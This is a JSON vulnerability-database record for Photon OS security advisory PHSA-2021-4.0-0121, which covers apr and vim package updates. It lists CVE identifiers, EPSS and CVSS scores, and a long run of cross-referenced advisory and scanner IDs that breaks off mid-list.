DATABASE RESOURCES PRICING ABOUT US

{"id": "PHSA-2021-4.0-0121", "vendorId": null, "type": "photon", "bulletinFamily": "unix", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0121", "description": "Updates of ['apr', 'vim'] packages of Photon OS have been released.\n", "published": "2021-10-29T00:00:00", "modified": "2021-10-29T00:00:00", "epss": [{"cve": "CVE-2021-35940", "epss": 0.00079, "percentile": 0.33178, "modified": "2023-11-27"}, {"cve": "CVE-2021-3872", "epss": 0.00098, "percentile": 0.4055, "modified": "2023-11-27"}, {"cve": "CVE-2021-3875", "epss": 0.001, "percentile": 0.4093, "modified": "2023-11-27"}, {"cve": "CVE-2023-34060", "epss": 0.00225, "percentile": 0.60608, "modified": "2023-11-27"}], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}}, "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-121", "reporter": "Photon", "references": [], "cvelist": ["CVE-2021-35940", "CVE-2021-3872", "CVE-2021-3875", "CVE-2023-34060"], "immutableFields": [], "lastseen": "2023-11-28T02:54:36", "viewCount": 3, "enchantments": {"score": {"value": 10.0, "uncertanity": 1.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2022:0366"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-35940", "ALPINE:CVE-2021-3872", "ALPINE:CVE-2021-3875"]}, {"type": "amazon", "idList": ["ALAS-2021-1728", "ALAS2-2021-1728", "ALAS2-2023-1936"]}, {"type": "avleonov", "idList": ["AVLEONOV:317FBD7DA93C95993A9FFF38FB04A987"]}, {"type": "cbl_mariner", "idList": ["CBLMARINER:6018", "CBLMARINER:6028"]}, {"type": "cloudlinux", "idList": ["CLSA-2021:1636568811", "CLSA-2021:1637673150"]}, {"type": "cnvd", "idList": ["CNVD-2021-101185", "CNVD-2021-70094", "CNVD-2022-05073"]}, {"type": "cve", "idList": ["CVE-2021-35940", "CVE-2021-3872", "CVE-2021-3875", "CVE-2023-34060"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2947-1:D6954"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-35940", "DEBIANCVE:CVE-2021-3872", "DEBIANCVE:CVE-2021-3875"]}, {"type": "fedora", "idList": ["FEDORA:4863E3093F4C", "FEDORA:B14C530A6A1B"]}, {"type": "gentoo", "idList": ["GLSA-202208-32"]}, {"type": "hivepro", "idList": ["HIVEPRO:8F75F0DA225CCE50A996BDCCDB9B77D2"]}, {"type": "huntr", "idList": ["5CDBC168-6BA1-4BC2-BA6C-28BE12166A53", "C958013B-1C09-4939-92CA-92F50AA169E8"]}, {"type": "ibm", "idList": ["24B1AE073C3E8B032429754E1E35B7D96539587DDA275F7A13183F44D07B88D2", "D56EBBD4671C81624AEF1C667DA00AAEE24DD2706C019B41D11E21168679B99D"]}, {"type": "ics", "idList": ["ICSA-23-164-03"]}, {"type": "mageia", "idList": ["MGASA-2021-0428", "MGASA-2021-0535"]}, {"type": "nessus", "idList": ["AL2023_ALAS2023-2023-016.NASL", "AL2_ALAS-2021-1728.NASL", "AL2_ALAS-2023-1936.NASL", "ALMA_LINUX_ALSA-2022-0366.NASL", "CENTOS8_RHSA-2022-0366.NASL", "DEBIAN_DLA-2947.NASL", "EULEROS_SA-2021-2817.NASL", "EULEROS_SA-2021-2845.NASL", "EULEROS_SA-2021-2848.NASL", "EULEROS_SA-2021-2937.NASL", "EULEROS_SA-2022-1020.NASL", "EULEROS_SA-2022-1040.NASL", "EULEROS_SA-2022-1054.NASL", "EULEROS_SA-2022-1153.NASL", "EULEROS_SA-2022-1193.NASL", "EULEROS_SA-2022-1217.NASL", "EULEROS_SA-2022-1236.NASL", "EULEROS_SA-2022-1389.NASL", "EULEROS_SA-2022-1415.NASL", "EULEROS_SA-2022-1699.NASL", "EULEROS_SA-2023-1053.NASL", "EULEROS_SA-2023-1303.NASL", "GENTOO_GLSA-202208-32.NASL", "OPENSUSE-2022-0736-1.NASL", "ORACLELINUX_ELSA-2022-0366.NASL", "REDHAT-RHSA-2022-0366.NASL", "ROCKY_LINUX_RLSA-2022-0366.NASL", "SLACKWARE_SSA_2023-032-01.NASL", "SUSE_SU-2022-0736-1.NASL", "SUSE_SU-2022-2102-1.NASL", "SUSE_SU-2022-4619-1.NASL", "UBUNTU_USN-5056-1.NASL", "UBUNTU_USN-5147-1.NASL", "VMWARE_CLOUD_DIRECTOR_VMSA-2023-0026.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2022-0366"]}, {"type": "osv", "idList": ["OSV:CVE-2021-35940"]}, {"type": "photon", "idList": ["PHSA-2016-0006", "PHSA-2016-0007", "PHSA-2017-0001", "PHSA-2017-0002", "PHSA-2017-0003", "PHSA-2017-0004", "PHSA-2017-0005", "PHSA-2017-0006", "PHSA-2017-0007", "PHSA-2017-0008", "PHSA-2017-0010", "PHSA-2017-0016", "PHSA-2017-0022", "PHSA-2017-0026", "PHSA-2017-0031", "PHSA-2017-0035", "PHSA-2017-0037", "PHSA-2017-0038", "PHSA-2017-0040", "PHSA-2017-0041", "PHSA-2017-0042", "PHSA-2017-0044", "PHSA-2017-0048", "PHSA-2017-0049", "PHSA-2017-0051", "PHSA-2017-0052", "PHSA-2017-0053", "PHSA-2017-0054", "PHSA-2017-0055", "PHSA-2017-0057", "PHSA-2017-0061", "PHSA-2017-0062", "PHSA-2017-0063", "PHSA-2017-0065", "PHSA-2017-0066", "PHSA-2017-0067", "PHSA-2017-0070", "PHSA-2017-0074", "PHSA-2017-0075", "PHSA-2017-0076", "PHSA-2017-0077", "PHSA-2017-0078", "PHSA-2017-0079", "PHSA-2017-0080", "PHSA-2017-0082", "PHSA-2017-0083", "PHSA-2017-0084", "PHSA-2017-0087", "PHSA-2017-0088", "PHSA-2017-0090", "PHSA-2017-0091", "PHSA-2017-0093", "PHSA-2017-0095", "PHSA-2018-0009", "PHSA-2018-0010", "PHSA-2018-0011", "PHSA-2018-0012", "PHSA-2018-0013", "PHSA-2018-0014", "PHSA-2018-0015", "PHSA-2018-0016", "PHSA-2018-0017", "PHSA-2018-0018", "PHSA-2018-0020", "PHSA-2018-0021", "PHSA-2018-0026", "PHSA-2018-0028", "PHSA-2018-0029", "PHSA-2018-0031", "PHSA-2018-0033", "PHSA-2018-0034", "PHSA-2018-0037", "PHSA-2018-0039", "PHSA-2018-0040", "PHSA-2018-0041", "PHSA-2018-0042", "PHSA-2018-0043", "PHSA-2018-0044", "PHSA-2018-0048", "PHSA-2018-0049", "PHSA-2018-0050", "PHSA-2018-0052", "PHSA-2018-0053", "PHSA-2018-0058", "PHSA-2018-0060", "PHSA-2018-0062", "PHSA-2018-0064", "PHSA-2018-0065", "PHSA-2018-0066", "PHSA-2018-0067", "PHSA-2018-0068", "PHSA-2018-0070", "PHSA-2018-0072", "PHSA-2018-0073", "PHSA-2018-0074", "PHSA-2018-0075", "PHSA-2018-0076", "PHSA-2018-0077", "PHSA-2018-0078", "PHSA-2018-0079", "PHSA-2018-0080", "PHSA-2018-0082", "PHSA-2018-0083", "PHSA-2018-0084", "PHSA-2018-0086", "PHSA-2018-0087", "PHSA-2018-0088", "PHSA-2018-0089", "PHSA-2018-0091", "PHSA-2018-0093", "PHSA-2018-0096", "PHSA-2018-0097", "PHSA-2018-0098", "PHSA-2018-0099", "PHSA-2018-0100", "PHSA-2018-0101", "PHSA-2018-0102", "PHSA-2018-0103", "PHSA-2018-0104", "PHSA-2018-0105", "PHSA-2018-0106", "PHSA-2018-0107", "PHSA-2018-0108", "PHSA-2018-0109", "PHSA-2018-0110", "PHSA-2018-0111", "PHSA-2018-0112", "PHSA-2018-0113", "PHSA-2018-0116", "PHSA-2018-0117", "PHSA-2018-0119", "PHSA-2018-0122", "PHSA-2018-0123", "PHSA-2018-0124", "PHSA-2018-0125", "PHSA-2018-0126", "PHSA-2018-0129", "PHSA-2018-0130", "PHSA-2018-0132", "PHSA-2018-0133", "PHSA-2018-0134", "PHSA-2018-0135", "PHSA-2018-0140", "PHSA-2018-0142", "PHSA-2018-0144", "PHSA-2018-0145", "PHSA-2018-0148", "PHSA-2018-0149", "PHSA-2018-0150", "PHSA-2018-0151", "PHSA-2018-0153", "PHSA-2018-0154", "PHSA-2018-0155", "PHSA-2018-0156", "PHSA-2018-0158", "PHSA-2018-0159", "PHSA-2018-0160", "PHSA-2018-0161", "PHSA-2018-0164", "PHSA-2018-0165", "PHSA-2018-0167", "PHSA-2018-0169", "PHSA-2018-0170", "PHSA-2018-0171", "PHSA-2018-0173", "PHSA-2018-0174", "PHSA-2018-0175", "PHSA-2018-0176", "PHSA-2018-0177", "PHSA-2018-0178", "PHSA-2018-0180", "PHSA-2018-0181", "PHSA-2018-0182", "PHSA-2018-0184", "PHSA-2018-0185", "PHSA-2018-0186", "PHSA-2018-0189", "PHSA-2018-0190", "PHSA-2018-0192", "PHSA-2018-0193", "PHSA-2018-0194", "PHSA-2018-0196", "PHSA-2018-0198", "PHSA-2018-0199", "PHSA-2018-0201", "PHSA-2019-0117", "PHSA-2019-0118", "PHSA-2019-0119", "PHSA-2019-0120", "PHSA-2019-0121", "PHSA-2019-0122", "PHSA-2019-0124", "PHSA-2019-0125", "PHSA-2019-0126", "PHSA-2019-0128", "PHSA-2019-0130", "PHSA-2019-0131", "PHSA-2019-0132", "PHSA-2019-0134", "PHSA-2019-0135", "PHSA-2019-0136", "PHSA-2019-0137", "PHSA-2019-0138", "PHSA-2019-0139", "PHSA-2019-0140", "PHSA-2019-0141", "PHSA-2019-0142", "PHSA-2019-0145", "PHSA-2019-0146", "PHSA-2019-0147", "PHSA-2019-0148", "PHSA-2019-0149", "PHSA-2019-0150", "PHSA-2019-0151", "PHSA-2019-0152", "PHSA-2019-0153", "PHSA-2019-0154", "PHSA-2019-0155", "PHSA-2019-0157", "PHSA-2019-0159", "PHSA-2019-0160", "PHSA-2019-0161", "PHSA-2019-0162", "PHSA-2019-0163", "PHSA-2019-0164", "PHSA-2019-0165", "PHSA-2019-0166", "PHSA-2019-0167", "PHSA-2019-0168", "PHSA-2019-0171", "PHSA-2019-0172", "PHSA-2019-0173", "PHSA-2019-0175", "PHSA-2019-0176", "PHSA-2019-0177", "PHSA-2019-0178", "PHSA-2019-0181", "PHSA-2019-0182", "PHSA-2019-0183", "PHSA-2019-0184", "PHSA-2019-0185", "PHSA-2019-0186", "PHSA-2019-0187", "PHSA-2019-0189", "PHSA-2019-0190", "PHSA-2019-0191", "PHSA-2019-0192", "PHSA-2019-0193", "PHSA-2019-0194", "PHSA-2019-0195", "PHSA-2019-0196", "PHSA-2019-0197", "PHSA-2019-0198", "PHSA-2019-0199", "PHSA-2019-0202", "PHSA-2019-0203", "PHSA-2019-0204", "PHSA-2019-0205", "PHSA-2019-0206", "PHSA-2019-0207", "PHSA-2019-0208", "PHSA-2019-0209", "PHSA-2019-0211", "PHSA-2019-0212", "PHSA-2019-0213", "PHSA-2019-0214", "PHSA-2019-0215", "PHSA-2019-0216", "PHSA-2019-0218", "PHSA-2019-0220", "PHSA-2019-0221", "PHSA-2019-0222", "PHSA-2019-0223", "PHSA-2019-0224", "PHSA-2019-0225", "PHSA-2019-0226", "PHSA-2019-0227", "PHSA-2019-0228", "PHSA-2019-0229", "PHSA-2019-0230", "PHSA-2019-0231", "PHSA-2019-0232", "PHSA-2019-0234", "PHSA-2019-0235", "PHSA-2019-0236", "PHSA-2019-0237", "PHSA-2019-0239", "PHSA-2019-0240", "PHSA-2019-0241", "PHSA-2019-0242", "PHSA-2019-0243", "PHSA-2019-0244", "PHSA-2019-0245", "PHSA-2019-0246", "PHSA-2019-0247", "PHSA-2019-0248", "PHSA-2019-0249", "PHSA-2019-0250", "PHSA-2019-0251", "PHSA-2019-0252", "PHSA-2019-0253", "PHSA-2019-0254", "PHSA-2019-0255", "PHSA-2019-0256", "PHSA-2019-0257", "PHSA-2019-0259", "PHSA-2019-0260", "PHSA-2019-0261", "PHSA-2019-0262", "PHSA-2019-0263", "PHSA-2019-3.0-0001", "PHSA-2019-3.0-0002", "PHSA-2019-3.0-0003", "PHSA-2019-3.0-0004", "PHSA-2019-3.0-0006", "PHSA-2019-3.0-0007", "PHSA-2019-3.0-0008", "PHSA-2019-3.0-0009", "PHSA-2019-3.0-0010", "PHSA-2019-3.0-0011", "PHSA-2019-3.0-0012", "PHSA-2019-3.0-0013", "PHSA-2019-3.0-0014", "PHSA-2019-3.0-0015", "PHSA-2019-3.0-0016", "PHSA-2019-3.0-0017", "PHSA-2019-3.0-0018", "PHSA-2019-3.0-0019", "PHSA-2019-3.0-0020", "PHSA-2019-3.0-0021", "PHSA-2019-3.0-0022", "PHSA-2019-3.0-0023", "PHSA-2019-3.0-0024", "PHSA-2019-3.0-0025", "PHSA-2019-3.0-0026", "PHSA-2019-3.0-0027", "PHSA-2019-3.0-0028", "PHSA-2019-3.0-0030", "PHSA-2019-3.0-0031", "PHSA-2019-3.0-0032", "PHSA-2019-3.0-0033", "PHSA-2019-3.0-0034", "PHSA-2019-3.0-0035", "PHSA-2019-3.0-0036", "PHSA-2019-3.0-0037", "PHSA-2019-3.0-0038", "PHSA-2019-3.0-0039", "PHSA-2019-3.0-0041", "PHSA-2019-3.0-0043", "PHSA-2019-3.0-0044", "PHSA-2019-3.0-0045", "PHSA-2019-3.0-0046", "PHSA-2020-0200", "PHSA-2020-0201", "PHSA-2020-0202", "PHSA-2020-0203", "PHSA-2020-0204", "PHSA-2020-0205", "PHSA-2020-0207", "PHSA-2020-0208", "PHSA-2020-0209", "PHSA-2020-0210", "PHSA-2020-0211", "PHSA-2020-0212", "PHSA-2020-0213", "PHSA-2020-0214", "PHSA-2020-0216", "PHSA-2020-0217", "PHSA-2020-0218", "PHSA-2020-0219", "PHSA-2020-0220", "PHSA-2020-0221", "PHSA-2020-0222", "PHSA-2020-0223", "PHSA-2020-0224", "PHSA-2020-0225", "PHSA-2020-0226", "PHSA-2020-0227", "PHSA-2020-0228", "PHSA-2020-0229", "PHSA-2020-0230", "PHSA-2020-0231", "PHSA-2020-0233", "PHSA-2020-0234", "PHSA-2020-0235", "PHSA-2020-0236", "PHSA-2020-0237", "PHSA-2020-0238", "PHSA-2020-0239", "PHSA-2020-0240", "PHSA-2020-0241", "PHSA-2020-0242", "PHSA-2020-0243", "PHSA-2020-0244", "PHSA-2020-0245", "PHSA-2020-0246", "PHSA-2020-0247", "PHSA-2020-0248", "PHSA-2020-0249", "PHSA-2020-0251", "PHSA-2020-0252", "PHSA-2020-0253", "PHSA-2020-0254", "PHSA-2020-0255", "PHSA-2020-0256", "PHSA-2020-0257", "PHSA-2020-0258", "PHSA-2020-0259", "PHSA-2020-0260", "PHSA-2020-0261", "PHSA-2020-0262", "PHSA-2020-0263", "PHSA-2020-0264", "PHSA-2020-0265", "PHSA-2020-0266", "PHSA-2020-0267", "PHSA-2020-0268", "PHSA-2020-0269", "PHSA-2020-0270", "PHSA-2020-0271", "PHSA-2020-0272", "PHSA-2020-0273", "PHSA-2020-0274", "PHSA-2020-0275", "PHSA-2020-0276", "PHSA-2020-0277", "PHSA-2020-0278", "PHSA-2020-0279", "PHSA-2020-0280", "PHSA-2020-0281", "PHSA-2020-0282", "PHSA-2020-0283", "PHSA-2020-0284", "PHSA-2020-0285", "PHSA-2020-0286", "PHSA-2020-0287", "PHSA-2020-0288", "PHSA-2020-0289", "PHSA-2020-0290", "PHSA-2020-0291", "PHSA-2020-0292", "PHSA-2020-0293", "PHSA-2020-0294", "PHSA-2020-0295", "PHSA-2020-0296", "PHSA-2020-0297", "PHSA-2020-0298", "PHSA-2020-0299", "PHSA-2020-0300", "PHSA-2020-0301", "PHSA-2020-0302", "PHSA-2020-0303", "PHSA-2020-0304", "PHSA-2020-0305", "PHSA-2020-0306", "PHSA-2020-0307", "PHSA-2020-0308", "PHSA-2020-0309", "PHSA-2020-0310", "PHSA-2020-0311", "PHSA-2020-0312", "PHSA-2020-0313", "PHSA-2020-0314", "PHSA-2020-0315", "PHSA-2020-0316", "PHSA-2020-0318", "PHSA-2020-0319", "PHSA-2020-0320", "PHSA-2020-0321", "PHSA-2020-0322", "PHSA-2020-0323", "PHSA-2020-0324", "PHSA-2020-0325", "PHSA-2020-0326", "PHSA-2020-0327", "PHSA-2020-0328", "PHSA-2020-0329", "PHSA-2020-0330", "PHSA-2020-0331", "PHSA-2020-0332", "PHSA-2020-0333", "PHSA-2020-0334", "PHSA-2020-0335", "PHSA-2020-0338", "PHSA-2020-0339", "PHSA-2020-0340", "PHSA-2020-0343", "PHSA-2020-0345", "PHSA-2020-0346", "PHSA-2020-0348", "PHSA-2020-0349", "PHSA-2020-0350", "PHSA-2020-3.0-0047", "PHSA-2020-3.0-0048", "PHSA-2020-3.0-0049", "PHSA-2020-3.0-0051", "PHSA-2020-3.0-0052", "PHSA-2020-3.0-0053", "PHSA-2020-3.0-0054", "PHSA-2020-3.0-0055", "PHSA-2020-3.0-0057", "PHSA-2020-3.0-0058", "PHSA-2020-3.0-0059", "PHSA-2020-3.0-0060", "PHSA-2020-3.0-0063", "PHSA-2020-3.0-0065", "PHSA-2020-3.0-0067", "PHSA-2020-3.0-0068", "PHSA-2020-3.0-0069", "PHSA-2020-3.0-0072", "PHSA-2020-3.0-0073", "PHSA-2020-3.0-0077", "PHSA-2020-3.0-0078", "PHSA-2020-3.0-0079", "PHSA-2020-3.0-0080", "PHSA-2020-3.0-0081", "PHSA-2020-3.0-0082", "PHSA-2020-3.0-0083", "PHSA-2020-3.0-0084", "PHSA-2020-3.0-0085", "PHSA-2020-3.0-0086", "PHSA-2020-3.0-0087", "PHSA-2020-3.0-0088", "PHSA-2020-3.0-0089", "PHSA-2020-3.0-0090", "PHSA-2020-3.0-0091", "PHSA-2020-3.0-0093", "PHSA-2020-3.0-0096", "PHSA-2020-3.0-0097", "PHSA-2020-3.0-0098", "PHSA-2020-3.0-0099", "PHSA-2020-3.0-0100", "PHSA-2020-3.0-0101", "PHSA-2020-3.0-0102", "PHSA-2020-3.0-0103", "PHSA-2020-3.0-0104", "PHSA-2020-3.0-0105", "PHSA-2020-3.0-0106", "PHSA-2020-3.0-0108", "PHSA-2020-3.0-0109", "PHSA-2020-3.0-0111", "PHSA-2020-3.0-0113", "PHSA-2020-3.0-0114", "PHSA-2020-3.0-0115", "PHSA-2020-3.0-0116", "PHSA-2020-3.0-0118", "PHSA-2020-3.0-0119", "PHSA-2020-3.0-0120", "PHSA-2020-3.0-0123", "PHSA-2020-3.0-0125", "PHSA-2020-3.0-0126", "PHSA-2020-3.0-0127", "PHSA-2020-3.0-0129", "PHSA-2020-3.0-0130", "PHSA-2020-3.0-0131", "PHSA-2020-3.0-0133", "PHSA-2020-3.0-0134", "PHSA-2020-3.0-0135", "PHSA-2020-3.0-0137", "PHSA-2020-3.0-0138", "PHSA-2020-3.0-0139", "PHSA-2020-3.0-0140", "PHSA-2020-3.0-0141", "PHSA-2020-3.0-0142", "PHSA-2020-3.0-0144", "PHSA-2020-3.0-0145", "PHSA-2020-3.0-0146", "PHSA-2020-3.0-0147", "PHSA-2020-3.0-0150", "PHSA-2020-3.0-0151", "PHSA-2020-3.0-0152", "PHSA-2020-3.0-0153", "PHSA-2020-3.0-0155", "PHSA-2020-3.0-0158", "PHSA-2020-3.0-0160", "PHSA-2020-3.0-0161", "PHSA-2020-3.0-0162", "PHSA-2020-3.0-0163", "PHSA-2020-3.0-0164", "PHSA-2020-3.0-0165", "PHSA-2020-3.0-0166", "PHSA-2020-3.0-0168", "PHSA-2020-3.0-0171", "PHSA-2020-3.0-0172", "PHSA-2020-3.0-0173", "PHSA-2020-3.0-0174", "PHSA-2020-3.0-0175", "PHSA-2020-3.0-0176", "PHSA-2020-3.0-0177", "PHSA-2020-3.0-0179", "PHSA-2020-3.0-0180", "PHSA-2021-0121", "PHSA-2021-0308", "PHSA-2021-0310", "PHSA-2021-0312", "PHSA-2021-0313", "PHSA-2021-0314", "PHSA-2021-0315", "PHSA-2021-0317", "PHSA-2021-0318", "PHSA-2021-0319", "PHSA-2021-0320", "PHSA-2021-0321", "PHSA-2021-0322", "PHSA-2021-0323", "PHSA-2021-0325", "PHSA-2021-0326", "PHSA-2021-0327", "PHSA-2021-0328", "PHSA-2021-0329", "PHSA-2021-0330", "PHSA-2021-0331", "PHSA-2021-0332", "PHSA-2021-0333", "PHSA-2021-0334", "PHSA-2021-0335", "PHSA-2021-0336", "PHSA-2021-0337", "PHSA-2021-0338", "PHSA-2021-0339", "PHSA-2021-0340", "PHSA-2021-0341", "PHSA-2021-0342", "PHSA-2021-0343", "PHSA-2021-0344", "PHSA-2021-0347", "PHSA-2021-0348", "PHSA-2021-0349", "PHSA-2021-0350", "PHSA-2021-0351", "PHSA-2021-0352", "PHSA-2021-0353", "PHSA-2021-0354", "PHSA-2021-0355", "PHSA-2021-0356", "PHSA-2021-0357", "PHSA-2021-0358", "PHSA-2021-0359", "PHSA-2021-0360", "PHSA-2021-0361", "PHSA-2021-0362", "PHSA-2021-0363", "PHSA-2021-0364", "PHSA-2021-0365", "PHSA-2021-0366", "PHSA-2021-0367", "PHSA-2021-0368", "PHSA-2021-0369", "PHSA-2021-0370", "PHSA-2021-0371", "PHSA-2021-0372", "PHSA-2021-0373", "PHSA-2021-0374", "PHSA-2021-0375", "PHSA-2021-0376", "PHSA-2021-0377", "PHSA-2021-0378", "PHSA-2021-0379", "PHSA-2021-0380", "PHSA-2021-0381", "PHSA-2021-0382", "PHSA-2021-0383", "PHSA-2021-0384", "PHSA-2021-0385", "PHSA-2021-0386", "PHSA-2021-0387", "PHSA-2021-0388", "PHSA-2021-0390", "PHSA-2021-0391", "PHSA-2021-0392", "PHSA-2021-0393", "PHSA-2021-0394", "PHSA-2021-0395", "PHSA-2021-0396", "PHSA-2021-0397", "PHSA-2021-0398", "PHSA-2021-0399", "PHSA-2021-0400", "PHSA-2021-0401", "PHSA-2021-0402", "PHSA-2021-0403", "PHSA-2021-0404", "PHSA-2021-0405", "PHSA-2021-0406", "PHSA-2021-0407", "PHSA-2021-0408", "PHSA-2021-0409", "PHSA-2021-0410", "PHSA-2021-0412", "PHSA-2021-0413", "PHSA-2021-0414", "PHSA-2021-0415", "PHSA-2021-0416", "PHSA-2021-0417", "PHSA-2021-0418", "PHSA-2021-0419", "PHSA-2021-0420", "PHSA-2021-0421", "PHSA-2021-0422", "PHSA-2021-0423", "PHSA-2021-0424", "PHSA-2021-0426", "PHSA-2021-0427", "PHSA-2021-0428", "PHSA-2021-0429", "PHSA-2021-0430", "PHSA-2021-0431", "PHSA-2021-0432", "PHSA-2021-0433", "PHSA-2021-0434", "PHSA-2021-0435", "PHSA-2021-0436", "PHSA-2021-0437", "PHSA-2021-0438", "PHSA-2021-0439", "PHSA-2021-0440", "PHSA-2021-0442", "PHSA-2021-0443", "PHSA-2021-0444", "PHSA-2021-0445", "PHSA-2021-0446", "PHSA-2021-0447", "PHSA-2021-0448", "PHSA-2021-0449", "PHSA-2021-0452", "PHSA-2021-0454", "PHSA-2021-0455", "PHSA-2021-0458", "PHSA-2021-0459", "PHSA-2021-0461", "PHSA-2021-3.0-0181", "PHSA-2021-3.0-0182", "PHSA-2021-3.0-0185", "PHSA-2021-3.0-0186", "PHSA-2021-3.0-0188", "PHSA-2021-3.0-0189", "PHSA-2021-3.0-0190", "PHSA-2021-3.0-0192", "PHSA-2021-3.0-0193", "PHSA-2021-3.0-0196", "PHSA-2021-3.0-0197", "PHSA-2021-3.0-0200", "PHSA-2021-3.0-0201", "PHSA-2021-3.0-0202", "PHSA-2021-3.0-0203", "PHSA-2021-3.0-0204", "PHSA-2021-3.0-0207", "PHSA-2021-3.0-0208", "PHSA-2021-3.0-0209", "PHSA-2021-3.0-0210", "PHSA-2021-3.0-0213", "PHSA-2021-3.0-0214", "PHSA-2021-3.0-0215", "PHSA-2021-3.0-0219", "PHSA-2021-3.0-0220", "PHSA-2021-3.0-0221", "PHSA-2021-3.0-0223", "PHSA-2021-3.0-0226", "PHSA-2021-3.0-0227", "PHSA-2021-3.0-0228", "PHSA-2021-3.0-0229", "PHSA-2021-3.0-0230", "PHSA-2021-3.0-0231", "PHSA-2021-3.0-0232", "PHSA-2021-3.0-0233", "PHSA-2021-3.0-0234", "PHSA-2021-3.0-0235", "PHSA-2021-3.0-0236", "PHSA-2021-3.0-0237", "PHSA-2021-3.0-0239", "PHSA-2021-3.0-0240", "PHSA-2021-3.0-0241", "PHSA-2021-3.0-0243", "PHSA-2021-3.0-0244", "PHSA-2021-3.0-0246", "PHSA-2021-3.0-0247", "PHSA-2021-3.0-0248", "PHSA-2021-3.0-0249", "PHSA-2021-3.0-0251", "PHSA-2021-3.0-0253", "PHSA-2021-3.0-0254", "PHSA-2021-3.0-0255", "PHSA-2021-3.0-0257", "PHSA-2021-3.0-0258", "PHSA-2021-3.0-0259", "PHSA-2021-3.0-0261", "PHSA-2021-3.0-0262", "PHSA-2021-3.0-0263", "PHSA-2021-3.0-0265", "PHSA-2021-3.0-0266", "PHSA-2021-3.0-0268", "PHSA-2021-3.0-0269", "PHSA-2021-3.0-0270", "PHSA-2021-3.0-0272", "PHSA-2021-3.0-0273", "PHSA-2021-3.0-0274", "PHSA-2021-3.0-0276", "PHSA-2021-3.0-0277", "PHSA-2021-3.0-0278", "PHSA-2021-3.0-0279", "PHSA-2021-3.0-0280", "PHSA-2021-3.0-0281", "PHSA-2021-3.0-0282", "PHSA-2021-3.0-0283", "PHSA-2021-3.0-0286", "PHSA-2021-3.0-0288", "PHSA-2021-3.0-0290", "PHSA-2021-3.0-0292", "PHSA-2021-3.0-0293", "PHSA-2021-3.0-0294", "PHSA-2021-3.0-0295", "PHSA-2021-3.0-0298", "PHSA-2021-3.0-0299", "PHSA-2021-3.0-0300", "PHSA-2021-3.0-0301", "PHSA-2021-3.0-0302", "PHSA-2021-3.0-0303", "PHSA-2021-3.0-0305", "PHSA-2021-3.0-0308", "PHSA-2021-3.0-0309", "PHSA-2021-3.0-0311", "PHSA-2021-3.0-0312", "PHSA-2021-3.0-0313", "PHSA-2021-3.0-0314", "PHSA-2021-3.0-0316", "PHSA-2021-3.0-0320", "PHSA-2021-3.0-0321", "PHSA-2021-3.0-0322", "PHSA-2021-3.0-0324", "PHSA-2021-3.0-0325", "PHSA-2021-3.0-0327", "PHSA-2021-3.0-0334", "PHSA-2021-3.0-0336", "PHSA-2021-3.0-0337", "PHSA-2021-3.0-0338", "PHSA-2021-3.0-0341", "PHSA-2021-3.0-0342", "PHSA-2021-3.0-0344", "PHSA-2021-3.0-0345", "PHSA-2021-3.0-0346", "PHSA-2021-4.0-0001", "PHSA-2021-4.0-0003", "PHSA-2021-4.0-0004", "PHSA-2021-4.0-0005", "PHSA-2021-4.0-0006", "PHSA-2021-4.0-0007", "PHSA-2021-4.0-0008", "PHSA-2021-4.0-0009", "PHSA-2021-4.0-0010", "PHSA-2021-4.0-0011", "PHSA-2021-4.0-0012", "PHSA-2021-4.0-0013", "PHSA-2021-4.0-0014", "PHSA-2021-4.0-0015", "PHSA-2021-4.0-0016", "PHSA-2021-4.0-0017", "PHSA-2021-4.0-0018", "PHSA-2021-4.0-0019", "PHSA-2021-4.0-0022", "PHSA-2021-4.0-0023", "PHSA-2021-4.0-0024", "PHSA-2021-4.0-0026", "PHSA-2021-4.0-0027", "PHSA-2021-4.0-0028", "PHSA-2021-4.0-0029", "PHSA-2021-4.0-0030", "PHSA-2021-4.0-0031", "PHSA-2021-4.0-0032", "PHSA-2021-4.0-0033", "PHSA-2021-4.0-0034", "PHSA-2021-4.0-0035", "PHSA-2021-4.0-0036", "PHSA-2021-4.0-0037", "PHSA-2021-4.0-0038", "PHSA-2021-4.0-0039", "PHSA-2021-4.0-0041", "PHSA-2021-4.0-0043", "PHSA-2021-4.0-0046", "PHSA-2021-4.0-0047", "PHSA-2021-4.0-0048", "PHSA-2021-4.0-0050", "PHSA-2021-4.0-0051", "PHSA-2021-4.0-0052", "PHSA-2021-4.0-0054", "PHSA-2021-4.0-0055", "PHSA-2021-4.0-0058", "PHSA-2021-4.0-0059", "PHSA-2021-4.0-0060", "PHSA-2021-4.0-0062", "PHSA-2021-4.0-0063", "PHSA-2021-4.0-0064", "PHSA-2021-4.0-0065", "PHSA-2021-4.0-0066", "PHSA-2021-4.0-0068", "PHSA-2021-4.0-0069", "PHSA-2021-4.0-0072", "PHSA-2021-4.0-0073", "PHSA-2021-4.0-0074", "PHSA-2021-4.0-0075", "PHSA-2021-4.0-0076", "PHSA-2021-4.0-0077", "PHSA-2021-4.0-0078", "PHSA-2021-4.0-0079", "PHSA-2021-4.0-0081", "PHSA-2021-4.0-0083", "PHSA-2021-4.0-0084", 